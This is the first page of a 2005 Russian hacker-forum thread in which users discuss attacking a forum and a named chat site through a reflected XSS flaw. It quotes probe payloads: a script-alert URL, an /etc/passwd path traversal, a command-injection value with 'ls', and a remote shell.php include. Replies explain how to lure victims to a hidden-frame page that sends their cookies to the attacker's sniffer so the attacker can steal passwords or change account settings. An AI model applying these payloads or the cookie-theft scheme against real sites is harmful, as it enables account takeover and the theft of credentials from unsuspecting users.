Форум АНТИЧАТ
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   XSS в форуме. Вопросы.. (https://forum.antichat.xyz/showthread.php?t=8656)

k1b0rg 09.08.2005 11:49
XSS в форуме. Вопросы..
 
Прошу объяснить мне такую вещь.
Есть форум, и там можно в url прописать
http://forum/last.php?do=<script>alert()</script>
и выскакивает alert. Прбовал ../../../etc/passwd
неработает, пробовал еще
http://forum/last.php?do=test; ls -al
тоже не работает. Вставлял ссылку на другой сайт
http://forum/last.php?do=http://site/shell.php?c=pwd
Страница не загружается и в строке состояния пишется done. Подскажите что можно еще делать, или мож я что-то не правильно сделал.

censored! 09.08.2005 12:02
Пассивная XSS. Т.е. надо создать липовую фреймовую страничку и всех туда заманивать. В невидимом фрейме будет происходить отсылка кук вошедших к тебе на снифер.
Но надо проверять - что храниться в куках, дадут ли они что-нить тебе (смотря какой форум) и вообще - получиться или нет.

p.s.
Цитата:
http://forum/last.php?do=test; ls -al
правильней ;ls -la
Т.е. -al не правильно

k1b0rg 09.08.2005 12:29
а есть где нить статьи по этому, а то я не особо понял.

m0nzt3r 09.08.2005 22:39
а чего понимать то...пассивная хсс , надо чтобы жертва набрала это в урл своего браузера а он(а) этого не будет делать, уверяю)) хотя если ты в СИ разбираешься...

WizART 09.08.2005 23:18
Короче делай свою страницу и чтоб никто не видел, в отдельном фрейме юзай то что у тебя есть... а потом ставь ссылку на нее) говори, мол, супер-линк)

Zadoxlik 10.08.2005 12:42
Цитата:
Сообщение от censored!
p.s.
правильней ;ls -la
Т.е. -al не правильно
В чем разница ? и так и так - верно

k1b0rg 10.08.2005 17:26
кароче дело геммороем попахивает с этой xss, так?
ну а СИ я плохо владею никогда не увлекался чесанием, хотя уверяют что это круто.

Zadoxlik 10.08.2005 18:10
Странный ты человек. Какой помощи ты хочешь коли и информации никакой нет ?

То что ты там сверху описал - это могет быть все что угодно.

k1b0rg 10.08.2005 18:24
http://chat.gala.net/?index.php?"><script>alert()</script>
допустим вот такая бодяга.

censored! 10.08.2005 18:55
Цитата:
В чем разница ? и так и так - верно
точно. это параметры. от перестановки параметров выведенный листинг не поменяется. пасиб.

Цитата:
http://chat.gala.net/?index.php?"><script>alert()</script>
допустим вот такая бодяга.
здесь, по-моему, пассивная xss. php-including не пашет.

чего делаешь - сначала заходишь в чат и проверяешь:
а. что храниться в куках
б. можно ли без ввода пароля сменить настройки юзеру
потом проверяешь - сработает ли алерт если обращение будет идти с другого сайта
потом проверяешь если ты, например в этом алерте, передашь +, то вырежеться он или нет.
потом уже лепишь страничку (смотри мой пост выше) и приглашаешь посетить ее посетителям. А вот что у них будет происходить после посещения - зависит от тебя. Если в куках храниться пас - можешь куки передавать к себе на снифер и сохранять, можешь менять настройки (если это разрешено)


Время: 00:22
Страница 1 из 3 1 2 3 >
Показывать 40 сообщений этой темы на одной странице